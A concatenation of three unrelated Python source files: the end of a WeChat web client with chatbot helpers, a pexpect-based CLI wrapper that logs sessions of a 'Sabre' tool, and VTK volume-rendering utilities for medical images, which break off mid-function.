os.system('open %s &' % path)
def _run(self, str, func, *args):
self._echo(str)
if func(*args):
print '成功'
logging.debug('%s... 成功' % (str))
else:
print('失败\n[*] 退出程序')
logging.debug('%s... 失败' % (str))
logging.debug('[*] 退出程序')
exit()
def _echo(self, str):
sys.stdout.write(str)
sys.stdout.flush()
def _printQR(self, mat):
for i in mat:
BLACK = '\033[40m \033[0m'
WHITE = '\033[47m \033[0m'
print ''.join([BLACK if j else WHITE for j in i])
def _str2qr(self, str):
print(str)
qr = qrcode.QRCode()
qr.border = 1
qr.add_data(str)
qr.make()
# img = qr.make_image()
# img.save("qrcode.png")
#mat = qr.get_matrix()
#self._printQR(mat) # qr.print_tty() or qr.print_ascii()
qr.print_ascii(invert=True)
def _transcoding(self, data):
if not data:
return data
result = None
if type(data) == unicode:
result = data
elif type(data) == str:
result = data.decode('utf-8')
return result
def _get(self, url, api=None):
request = urllib2.Request(url=url)
request.add_header('Referer', 'https://wx.qq.com/')
if api == 'webwxgetvoice':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetvideo':
request.add_header('Range', 'bytes=0-')
try:
response = urllib2.urlopen(request)
data = response.read()
logging.debug(url)
return data
except urllib2.HTTPError, e:
logging.error('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.error('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
logging.error('HTTPException')
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _post(self, url, params, jsonfmt=True):
if jsonfmt:
request = urllib2.Request(url=url, data=json.dumps(params))
request.add_header(
'ContentType', 'application/json; charset=UTF-8')
else:
request = urllib2.Request(url=url, data=urllib.urlencode(params))
try:
response = urllib2.urlopen(request)
data = response.read()
if jsonfmt:
return json.loads(data, object_hook=_decode_dict)
return data
except urllib2.HTTPError, e:
logging.error('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.error('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
logging.error('HTTPException')
except Exception:
import traceback
logging.error('generic exception: ' + traceback.format_exc())
return ''
def _xiaodoubi(self, word):
url = 'http://www.xiaodoubi.com/bot/chat.php'
try:
r = requests.post(url, data={'chat': word})
return r.content
except:
return "让我一个人静静 T_T..."
def _simsimi(self, word):
key = ''
url = 'http://sandbox.api.simsimi.com/request.p?key=%s&lc=ch&ft=0.0&text=%s' % (
key, word)
r = requests.get(url)
ans = r.json()
if ans['result'] == '100':
return ans['response']
else:
return '你在说什么,风太大听不清列'
def _searchContent(self, key, content, fmat='attr'):
if fmat == 'attr':
pm = re.search(key + '\s?=\s?"([^"<]+)"', content)
if pm:
return pm.group(1)
elif fmat == 'xml':
pm = re.search('<{0}>([^<]+)</{0}>'.format(key), content)
if not pm:
pm = re.search(
'<{0}><\!\[CDATA\[(.*?)\]\]></{0}>'.format(key), content)
if pm:
return pm.group(1)
return '未知'
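# Wraps a stream so unicode/utf-8 output is re-encoded into whatever the
# target console supports; installed below for cp936 (GBK) Windows consoles,
# where printing utf-8 str objects would otherwise raise UnicodeEncodeError.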
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
def flush(self):
self.target.flush()
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
if not sys.platform.startswith('win'):
import coloredlogs
coloredlogs.install(level='DEBUG')
webwx = WebWeixin()
webwx.start()
|
s-cli.py
|
#!/usr/bin/python3
import getpass
import sys
import os
import subprocess
from time import gmtime, strftime, localtime
import re
import pexpect, struct, fcntl, termios, signal
import string
#import sh
#from multiprocessing import Process
u = subprocess.getstatusoutput('whoami')[1]
sd = subprocess.getstatusoutput('echo ~')
sd = sd[1]
t = strftime("%d-%m-%Y_%H-%M-%S", localtime())
f = open('%s/.sabre/%s-sabre.log' % (sd, t), 'w')  # timestamped session log
c = []
o = []
pmt = ''
setPrompt=''
logme = ''
init = True
def sigwinch_passthrough (sig, data):
    # propagate terminal resizes to the spawned child process
    packed = struct.pack("HHHH", 0, 0, 0, 0)
    a = struct.unpack('hhhh', fcntl.ioctl(sys.stdout.fileno(),
        termios.TIOCGWINSZ, packed))
    s.setwinsize(a[0], a[1])
def escape_ansi(line):
ansi_escape = re.compile(r'(\x9B|\x1B\[)[0-?]*[ -\/]*[@-~]')
line1 = ansi_escape.sub('', line)
line2 = line1.replace('^[(B', '')
return line2
def escape_vt100(line):
line1 = subprocess.getstatusoutput('echo "%s" | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g"' % line)[1]
return line1
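# escape_ansi strips ANSI CSI sequences via the regex above, e.g.
# escape_ansi('\x1b[31mred\x1b[0m') -> 'red'; escape_vt100 is a shell/sed
# based alternative that appears unused in this script.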
def userCmdLog(cmd):
global pmt
global init
global logme
global setPrompt
ti = strftime("%d-%m-%Y %H:%M:%S", localtime())
if cmd == '\r':
cm = ''.join(c)
c[:] = []
if setPrompt == 'session_':
pmt = setPrompt+cm+':'
setPrompt = ''
        if cm in ('sessions', 'ses', 'sess', 'sessi', 'sessio', 'session'):
setPrompt = 'session_'
cm = str(ti)+' '+str(u)+':'+' '+pmt+' '+str(cm)
        if init == False:
            logme = logme + '\n </output>\n</command>'
            parse = logme.split('\n')
            if parse[-1] == '</command>':
                writeme = '\n'.join(parse)
                f.write(writeme)
                f.flush()
                logme = ''
        if init == True:
            init = False
        logme = logme + '\n<command> %s\n <output>' % cm
else:
c.append(cmd)
return cmd
def outputCmdLog(cmd):
global pmt
global logme
cm = str(cmd, 'utf-8')
cm = escape_ansi(cm)
ti = strftime("%d-%m-%Y %H:%M:%S", localtime())
if 'OC' not in cm:
if '\n' in cm or '\r' in cm:
logme = logme + '%s' % cm
elif 'OC' in cm:
pmt = cm.split('\n')[0]
return cmd
os.system('clear')
b = subprocess.getstatusoutput('cat /opt/Sabre-TOC/sabres.txt')
b = b[1]
print(b)
v = subprocess.getstatusoutput('cat /opt/Sabre-TOC/version/version.txt')
v = v[1]
print(v)
try:
t = strftime("%d-%m-%Y_%H-%M-%S", localtime())
sd = subprocess.getstatusoutput('echo ~')
sd = sd[1]
s = pexpect.spawn("sudo -E /opt/Sabre-TOC/main.py")
sz = subprocess.getstatusoutput('stty size')
sz = sz[1]
l = str(sz).split()[0]
col = str(sz).split()[1]
s.setwinsize(int(l),int(col))
#sabreConnProc = Process(target=sabreConnFunc)
#sabreConnProc.start()
#sabreNativeConnProc = Process(target=sabreNativeConnFunc)
#sabreNativeConnProc.start()
print("Starting Sabre.........")
index = s.expect(['password', 'OC'])
if index == 0 :
p = getpass.getpass()
s.sendline(p)
elif index == 1 :
os.system('clear')
print(s.before)
signal.signal(signal.SIGWINCH, sigwinch_passthrough)
s.interact(input_filter=userCmdLog, output_filter=outputCmdLog)
f.close()
print("\nClosed Sabre! All sessions saved")
except Exception as e:
print("s-cli failed on login.")
print(e)
|
vtktools.py
|
# Copyright (c) 2020. The Medical Image Computing (MIC) Lab, 陶豪毅
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from vtk.util.vtkImageImportFromArray import *
import vtk
import numpy as np
import os
import threading
import multiprocessing
import pickle
def getRenderOfSrcImage(count, camera, renWinInteractor, numpyImage_src, spacing,
minValue=0, maxValue=10, pos=(0, 0, 1.0, 1.0)):
numpyImage_src = numpyImage_src.astype(np.float32) - np.min(numpyImage_src)
numpyImage_src = maxValue * numpyImage_src / np.max(numpyImage_src)
print('minValue, maxValue', minValue, maxValue)
render = vtk.vtkRenderer()
render.SetBackground(0.8, 0.8, 0.8)
render.SetActiveCamera(camera)
render.SetViewport(*pos)
img_arr = vtkImageImportFromArray()
img_arr.SetArray(np.ascontiguousarray(numpyImage_src))
img_arr.SetDataSpacing(spacing)
img_arr.SetDataOrigin((0, 0, 0))
img_arr.Update()
    # shifter = vtk.vtkImageShiftScale()  # optional shift/scale preprocessing; downstream code would then consume shifter
# shifter.SetShift(minValue)
# shifter.SetScale(maxValue)
# shifter.SetOutputScalarTypeToUnsignedShort()
# shifter.SetInputData(img_arr.GetOutput())
# shifter.ReleaseDataFlagOff()
# shifter.Update()
    tcfun = vtk.vtkPiecewiseFunction()  # scalar opacity transfer function
    tcfun.AddPoint(minValue, 0.0)
    tcfun.AddPoint(maxValue, 1.0)
    gradtfun = vtk.vtkPiecewiseFunction()  # gradient opacity transfer function
    gradtfun.AddPoint(0, 0)
    gradtfun.AddPoint(0.2, 0.1)
    gradtfun.AddPoint(0.6, 0.5)
    gradtfun.AddPoint(1.0, 1.0)
    ctfun = vtk.vtkColorTransferFunction()  # color transfer function
    ctfun.AddRGBPoint(minValue, 0.5, 0.0, 0.0)
    ctfun.AddRGBPoint(maxValue, 0.9, 0.2, 0.3)
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(img_arr.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
    volumeMapper_src = vtk.vtkGPUVolumeRayCastMapper()  # GPU ray-cast volume mapper
    volumeMapper_src.SetInputData(img_arr.GetOutput())  # feed the imported image data into the mapper
    volumeProperty = vtk.vtkVolumeProperty()  # holds the color and opacity transfer functions
    volumeProperty.SetColor(ctfun)
    volumeProperty.SetScalarOpacity(tcfun)
    volumeProperty.SetGradientOpacity(gradtfun)
    volumeProperty.SetInterpolationTypeToLinear()  # trilinear interpolation between voxels
    volumeProperty.ShadeOn()
    render_volume = vtk.vtkVolume()  # the volume actor
    render_volume.SetMapper(volumeMapper_src)
    render_volume.SetProperty(volumeProperty)
render.AddActor(outlineActor)
render.AddVolume(render_volume)
render.ResetCamera()
sliderRep_min = vtk.vtkSliderRepresentation2D()
sliderRep_min.SetMinimumValue(0)
sliderRep_min.SetMaximumValue(10)
sliderRep_min.SetValue(1)
sliderRep_min.SetTitleText("minValue")
sliderRep_min.SetSliderLength(0.025)
sliderRep_min.SetSliderWidth(0.05)
sliderRep_min.SetEndCapLength(0.005)
sliderRep_min.SetEndCapWidth(0.025)
sliderRep_min.SetTubeWidth(0.0125)
sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint1Coordinate().SetValue(0.15 / count, 0.1)
sliderRep_min.GetPoint2Coordinate().SetValue(0.45 / count, 0.1)
sliderWidget_min = vtk.vtkSliderWidget()
sliderWidget_min.SetInteractor(renWinInteractor)
sliderWidget_min.SetRepresentation(sliderRep_min)
sliderWidget_min.SetCurrentRenderer(render)
sliderWidget_min.SetAnimationModeToAnimate()
sliderRep_max = vtk.vtkSliderRepresentation2D()
sliderRep_max.SetMinimumValue(0)
sliderRep_max.SetMaximumValue(10)
sliderRep_max.SetValue(9)
sliderRep_max.SetTitleText("maxValue")
sliderRep_max.SetSliderLength(0.025)
sliderRep_max.SetSliderWidth(0.05)
sliderRep_max.SetEndCapLength(0.005)
sliderRep_max.SetEndCapWidth(0.025)
sliderRep_max.SetTubeWidth(0.0125)
sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint1Coordinate().SetValue(0.55 / count, 0.1)
sliderRep_max.GetPoint2Coordinate().SetValue(0.85 / count, 0.1)
sliderWidget_max = vtk.vtkSliderWidget()
sliderWidget_max.SetInteractor(renWinInteractor)
sliderWidget_max.SetRepresentation(sliderRep_max)
sliderWidget_max.SetCurrentRenderer(render)
sliderWidget_max.SetAnimationModeToAnimate()
def update_minmax(obj, ev):
# print(obj)
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
# reset value
if minValue >= maxValue:
if obj == sliderWidget_max:
sliderWidget_max.GetRepresentation().SetValue(max(maxValue, minValue + 0.01))
elif obj == sliderWidget_min:
sliderWidget_min.GetRepresentation().SetValue(min(maxValue - 0.01, minValue))
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
tcfun.RemoveAllPoints()
tcfun.AddPoint(minValue, 0.0)
tcfun.AddPoint(maxValue, 1.0)
volumeProperty.SetScalarOpacity(tcfun)
sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_min.EnabledOn()
sliderWidget_max.EnabledOn()
return render, sliderWidget_min, sliderWidget_max
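# Minimal usage sketch (assumptions: a standard VTK window/interactor setup
# and a NumPy volume; this is not part of the module's own API):
#
#   camera = vtk.vtkCamera()
#   renWin = vtk.vtkRenderWindow()
#   iren = vtk.vtkRenderWindowInteractor()
#   iren.SetRenderWindow(renWin)
#   vol = np.random.rand(64, 64, 64).astype(np.float32)
#   render, s_min, s_max = getRenderOfSrcImage(1, camera, iren, vol,
#                                              spacing=(1.0, 1.0, 1.0))
#   renWin.AddRenderer(render)
#   iren.Initialize()
#   renWin.Render()
#   iren.Start()
#
# Keep references to the returned slider widgets (s_min, s_max) so they are
# not garbage-collected while the interactor is running.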
def getRenderOfSegImage(count, camera, renWinInteractor, numpyImage_seg, spacing,
minValue=0, maxValue=10, pos=(0, 0, 1.0, 1.0)):
numpyImage_seg = numpyImage_seg.astype(np.float32) - np.min(numpyImage_seg)
numpyImage_seg = maxValue * numpyImage_seg / np.max(numpyImage_seg)
print('minValue, maxValue', minValue, maxValue)
render = vtk.vtkRenderer()
render.SetBackground(0.8, 0.8, 0.8)
render.SetActiveCamera(camera)
render.SetViewport(*pos)
img_arr_seg = vtkImageImportFromArray()
img_arr_seg.SetArray(np.ascontiguousarray(numpyImage_seg))
img_arr_seg.SetDataSpacing(spacing)
img_arr_seg.SetDataOrigin((0, 0, 0))
img_arr_seg.Update()
    tcfun_seg = vtk.vtkPiecewiseFunction()  # scalar opacity transfer function
    tcfun_seg.AddPoint(minValue, 0.0)
    tcfun_seg.AddPoint(maxValue, 1.0)
    gradtfun_seg = vtk.vtkPiecewiseFunction()  # gradient opacity transfer function
    gradtfun_seg.AddPoint(0, 0)
    gradtfun_seg.AddPoint(0.2, 0.1)
    gradtfun_seg.AddPoint(0.6, 0.3)
    gradtfun_seg.AddPoint(1.0, 0.6)
    ctfun_seg = vtk.vtkColorTransferFunction()  # color transfer function
    ctfun_seg.AddRGBPoint(minValue, 0.1, 0.9, 0.0)
    ctfun_seg.AddRGBPoint(maxValue, 0.1, 0.9, 0.3)
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(img_arr_seg.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
    volumeMapper_seg = vtk.vtkGPUVolumeRayCastMapper()  # GPU ray-cast volume mapper
    volumeMapper_seg.SetInputData(img_arr_seg.GetOutput())  # feed the imported segmentation into the mapper
    volumeProperty_seg = vtk.vtkVolumeProperty()  # holds the color and opacity transfer functions
    volumeProperty_seg.SetColor(ctfun_seg)
    volumeProperty_seg.SetScalarOpacity(tcfun_seg)
    volumeProperty_seg.SetGradientOpacity(gradtfun_seg)
    volumeProperty_seg.SetInterpolationTypeToLinear()  # trilinear interpolation between voxels
    volumeProperty_seg.ShadeOn()
    render_volume_seg = vtk.vtkVolume()  # the volume actor
    render_volume_seg.SetMapper(volumeMapper_seg)
    render_volume_seg.SetProperty(volumeProperty_seg)
render.AddActor(outlineActor)
render.AddVolume(render_volume_seg)
render.ResetCamera()
return render
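# Note: the src and seg renderers accept a shared vtkCamera and a normalized
# viewport `pos`, so linked side-by-side views are possible, e.g.
# (illustrative, assuming the same renWin/iren setup as above):
#
#   r_src, w1, w2 = getRenderOfSrcImage(2, camera, iren, img, spacing,
#                                       pos=(0.0, 0.0, 0.5, 1.0))
#   r_seg = getRenderOfSegImage(2, camera, iren, seg, spacing,
#                               pos=(0.5, 0.0, 1.0, 1.0))
#   renWin.AddRenderer(r_src)
#   renWin.AddRenderer(r_seg)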
def getRenderOfSrcImageWithClip(count, camera, renWinInteractor, numpyImage_src, spacing,
minValue=0, maxValue=10, pos=(0, 0, 1.0, 1.0)):
numpyImage_src = numpyImage_src.astype(np.float32) - np.min(numpyImage_src)
numpyImage_src = maxValue * numpyImage_src / np.max(numpyImage_src)
print('minValue, maxValue', minValue, maxValue)
render = vtk.vtkRenderer()
render.SetBackground(0.8, 0.8, 0.8)
render.SetActiveCamera(camera)
render.SetViewport(*pos)
img_arr = vtkImageImportFromArray()
img_arr.SetArray(np.ascontiguousarray(numpyImage_src))
img_arr.SetDataSpacing(spacing)
img_arr.SetDataOrigin((0, 0, 0))
img_arr.Update()
    tcfun = vtk.vtkPiecewiseFunction()  # scalar opacity transfer function
    tcfun.AddPoint(minValue, 0.0)
    # tcfun.AddPoint(minValue + 1, 0.3)
    tcfun.AddPoint(maxValue, 1.0)
    gradtfun = vtk.vtkPiecewiseFunction()  # gradient opacity transfer function
    gradtfun.AddPoint(0.0, 0.3)
    gradtfun.AddPoint(0.2, 0.4)
    gradtfun.AddPoint(0.6, 0.6)
    gradtfun.AddPoint(1.0, 1.0)
    ctfun = vtk.vtkColorTransferFunction()  # color transfer function
    ctfun.AddRGBPoint(minValue, 0.0, 0.0, 0.0)
    ctfun.AddRGBPoint(maxValue, 1.0, 1.0, 1.0)
outline = vtk.vtkOutlineFilter()
outline.SetInputConnection(img_arr.GetOutputPort())
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
dims = img_arr.GetOutput().GetDimensions()
print(dims)
extractVOI = vtk.vtkExtractVOI()
extractVOI.SetInputConnection(img_arr.GetOutputPort())
extractVOI.SetVOI(0, dims[0] - 1, 0, dims[1] - 1, 0, dims[2] - 1)
extractVOI.Update()
print(extractVOI.GetOutput().GetDimensions())
    volumeMapper_src = vtk.vtkGPUVolumeRayCastMapper()  # GPU ray-cast volume mapper
    volumeMapper_src.SetInputData(extractVOI.GetOutput())  # feed the extracted VOI into the mapper
    volumeProperty = vtk.vtkVolumeProperty()  # holds the color and opacity transfer functions
    volumeProperty.SetColor(ctfun)
    volumeProperty.SetScalarOpacity(tcfun)
    volumeProperty.SetGradientOpacity(gradtfun)
    volumeProperty.SetInterpolationTypeToLinear()  # trilinear interpolation between voxels
    volumeProperty.ShadeOn()
    render_volume = vtk.vtkVolume()  # the volume actor
    render_volume.SetMapper(volumeMapper_src)
    render_volume.SetProperty(volumeProperty)
render.AddActor(outlineActor)
render.AddVolume(render_volume)
render.ResetCamera()
sliderRep_min = vtk.vtkSliderRepresentation2D()
sliderRep_min.SetMinimumValue(0)
sliderRep_min.SetMaximumValue(10)
sliderRep_min.SetValue(1)
sliderRep_min.SetTitleText("minValue")
sliderRep_min.SetSliderLength(0.025)
sliderRep_min.SetSliderWidth(0.05)
sliderRep_min.SetEndCapLength(0.005)
sliderRep_min.SetEndCapWidth(0.025)
sliderRep_min.SetTubeWidth(0.0125)
sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint1Coordinate().SetValue(1 - 0.05 * count, 0.05)
sliderRep_min.GetPoint2Coordinate().SetValue(1 - 0.05 * count, 0.45)
sliderWidget_min = vtk.vtkSliderWidget()
sliderWidget_min.SetInteractor(renWinInteractor)
sliderWidget_min.SetRepresentation(sliderRep_min)
sliderWidget_min.SetCurrentRenderer(render)
sliderWidget_min.SetAnimationModeToAnimate()
sliderRep_max = vtk.vtkSliderRepresentation2D()
sliderRep_max.SetMinimumValue(0)
sliderRep_max.SetMaximumValue(10)
sliderRep_max.SetValue(9)
sliderRep_max.SetTitleText("maxValue")
sliderRep_max.SetSliderLength(0.025)
sliderRep_max.SetSliderWidth(0.05)
sliderRep_max.SetEndCapLength(0.005)
sliderRep_max.SetEndCapWidth(0.025)
sliderRep_max.SetTubeWidth(0.0125)
sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint1Coordinate().SetValue(1 - 0.05 * count, 0.55)
sliderRep_max.GetPoint2Coordinate().SetValue(1 - 0.05 * count, 0.95)
sliderWidget_max = vtk.vtkSliderWidget()
sliderWidget_max.SetInteractor(renWinInteractor)
sliderWidget_max.SetRepresentation(sliderRep_max)
sliderWidget_max.SetCurrentRenderer(render)
sliderWidget_max.SetAnimationModeToAnimate()
def update_minmax(obj, ev):
# print(obj)
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
# # reset value
if minValue >= maxValue:
if obj == sliderWidget_max:
sliderWidget_max.GetRepresentation().SetValue(max(maxValue, minValue + 0.01))
elif obj == sliderWidget_min:
sliderWidget_min.GetRepresentation().SetValue(min(maxValue - 0.01, minValue))
minValue = sliderWidget_min.GetRepresentation().GetValue()
maxValue = sliderWidget_max.GetRepresentation().GetValue()
tcfun.RemoveAllPoints()
tcfun.AddPoint(minValue, 0.0)
tcfun.AddPoint(maxValue, 1.0)
volumeProperty.SetScalarOpacity(tcfun)
print('update_minmax')
sliceActor_i_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_i_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_j_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_j_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_k_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_k_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_i_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_i_max.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_j_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_j_max.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_k_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_k_max.GetProperty().SetColorWindow(maxValue - minValue)
##########################################################
sliceActor_i_min = vtk.vtkImageSlice()
sliceMapper_i_min = vtk.vtkImageSliceMapper()
sliceMapper_i_min.SetInputData(img_arr.GetOutput())
sliceMapper_i_min.SetOrientationToX()
sliceMapper_i_min.SetSliceNumber(0)
sliceActor_i_min.SetMapper(sliceMapper_i_min)
sliceActor_j_min = vtk.vtkImageSlice()
sliceMapper_j_min = vtk.vtkImageSliceMapper()
sliceMapper_j_min.SetInputData(img_arr.GetOutput())
sliceMapper_j_min.SetOrientationToY()
sliceMapper_j_min.SetSliceNumber(0)
sliceActor_j_min.SetMapper(sliceMapper_j_min)
sliceActor_k_min = vtk.vtkImageSlice()
sliceMapper_k_min = vtk.vtkImageSliceMapper()
sliceMapper_k_min.SetInputData(img_arr.GetOutput())
sliceMapper_k_min.SetOrientationToZ()
sliceMapper_k_min.SetSliceNumber(0)
sliceActor_k_min.SetMapper(sliceMapper_k_min)
sliceActor_i_max = vtk.vtkImageSlice()
sliceMapper_i_max = vtk.vtkImageSliceMapper()
sliceMapper_i_max.SetInputData(img_arr.GetOutput())
sliceMapper_i_max.SetOrientationToX()
    sliceMapper_i_max.SetSliceNumber(dims[0] - 1)  # last valid slice index
sliceActor_i_max.SetMapper(sliceMapper_i_max)
sliceActor_j_max = vtk.vtkImageSlice()
sliceMapper_j_max = vtk.vtkImageSliceMapper()
sliceMapper_j_max.SetInputData(img_arr.GetOutput())
sliceMapper_j_max.SetOrientationToY()
    sliceMapper_j_max.SetSliceNumber(dims[1] - 1)  # last valid slice index
sliceActor_j_max.SetMapper(sliceMapper_j_max)
sliceActor_k_max = vtk.vtkImageSlice()
sliceMapper_k_max = vtk.vtkImageSliceMapper()
sliceMapper_k_max.SetInputData(img_arr.GetOutput())
sliceMapper_k_max.SetOrientationToZ()
    sliceMapper_k_max.SetSliceNumber(dims[2] - 1)  # last valid slice index
sliceActor_k_max.SetMapper(sliceMapper_k_max)
sliceActor_i_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_i_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_j_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_j_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_k_min.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_k_min.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_i_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_i_max.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_j_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_j_max.GetProperty().SetColorWindow(maxValue - minValue)
sliceActor_k_max.GetProperty().SetColorLevel(maxValue / 2 + minValue / 2)
sliceActor_k_max.GetProperty().SetColorWindow(maxValue - minValue)
render.AddActor(sliceActor_i_min)
render.AddActor(sliceActor_j_min)
render.AddActor(sliceActor_k_min)
render.AddActor(sliceActor_i_max)
render.AddActor(sliceActor_j_max)
render.AddActor(sliceActor_k_max)
#####################################################################
sliderWidget_min.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_max.AddObserver(vtk.vtkCommand.InteractionEvent, update_minmax)
sliderWidget_min.EnabledOn()
sliderWidget_max.EnabledOn()
def getCropSlider(dim_index, dim_size):
sliderRep_min = vtk.vtkSliderRepresentation2D()
sliderRep_min.SetMinimumValue(0)
sliderRep_min.SetMaximumValue(dim_size - 1)
sliderRep_min.SetValue(0)
        sliderRep_min.SetSliderLength(0.025)  # slider handle length
        sliderRep_min.SetSliderWidth(0.025)   # slider handle width
sliderRep_min.SetEndCapLength(0.005)
sliderRep_min.SetEndCapWidth(0.025)
sliderRep_min.SetTubeWidth(0.0125)
sliderRep_min.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_min.GetPoint1Coordinate().SetValue(0.05 * dim_index, 0.05)
sliderRep_min.GetPoint2Coordinate().SetValue(0.05 * dim_index, 0.45)
sliderWidget_min = vtk.vtkSliderWidget()
sliderWidget_min.SetInteractor(renWinInteractor)
sliderWidget_min.SetRepresentation(sliderRep_min)
sliderWidget_min.SetCurrentRenderer(render)
sliderWidget_min.SetAnimationModeToAnimate()
sliderRep_max = vtk.vtkSliderRepresentation2D()
sliderRep_max.SetMinimumValue(0)
sliderRep_max.SetMaximumValue(dim_size - 1)
sliderRep_max.SetValue(dim_size - 1)
sliderRep_max.SetSliderLength(0.025)
sliderRep_max.SetSliderWidth(0.025)
sliderRep_max.SetEndCapLength(0.005)
sliderRep_max.SetEndCapWidth(0.025)
sliderRep_max.SetTubeWidth(0.0125)
sliderRep_max.GetPoint1Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint2Coordinate().SetCoordinateSystemToNormalizedDisplay()
sliderRep_max.GetPoint1Coordinate().SetValue(0.05 * dim_index, 0.55)
sliderRep_max.GetPoint2Coordinate().SetValue(0.05 * dim_index, 0.95)
sliderWidget_max = vtk.vtkSliderWidget()
sliderWidget_max.SetInteractor(renWinInteractor)
sliderWidget_max.SetRepresentation(sliderRep_max)
sliderWidget_max.SetCurrentRenderer(render)
sliderWidget_max.SetAnimationModeToAnimate()
return sliderWidget_min, sliderWidget_max
def update_crop(obj, ev):
# print(obj)
dim1_minValue = dim1_sliderWidget_min.GetRepresentation().GetValue()
dim1_maxValue = dim1_sliderWidget_max.GetRepresentation().GetValue()
dim2_minValue = dim2_sliderWidget_min.GetRepresentation().GetValue()
dim2_maxValue = dim2_sliderWidget_max.GetRepresentation().GetValue()
dim3_minValue = dim3_sliderWidget_min.GetRepresentation().GetValue()
dim3_maxValue = dim3_sliderWidget_max.GetRepresentation().GetValue()
# # reset value
if dim1_minValue >= dim1_maxValue:
if obj == dim1_sliderWidget_max:
dim1_sliderWidget_max.GetRepresentation().SetValue(max(dim1_maxValue, dim1_minValue + 1))
elif obj == dim1_sliderWidget_min:
dim1_sliderWidget_min.GetRepresentation().SetValue(min(dim1_maxValue - 1, dim1_minValue))
if dim2_minValue >= dim2_maxValue:
if obj == dim2_sliderWidget_max:
dim2_sliderWidget_max.GetRepresentation().SetValue(max(dim2_maxValue, dim2_minValue + 1))
elif obj == dim2_sliderWidget_min:
dim2_sliderWidget_min.GetRepresentation().SetValue(min(dim2_maxValue - 1, dim2_minValue))
if dim3_minValue >= dim3_maxValue:
if obj == dim3_sliderWidget_max:
dim3_sliderWidget_max.GetRepresentation().SetValue(max(dim3_maxValue, dim3_minValue + 1))
elif obj == dim3_sliderWidget_min:
dim3_sliderWidget_min.GetRepresentation().SetValue(min(dim3_maxValue - 1, dim3_minValue))
dim1_minValue = dim1_sliderWidget_min.GetRepresentation().GetValue()
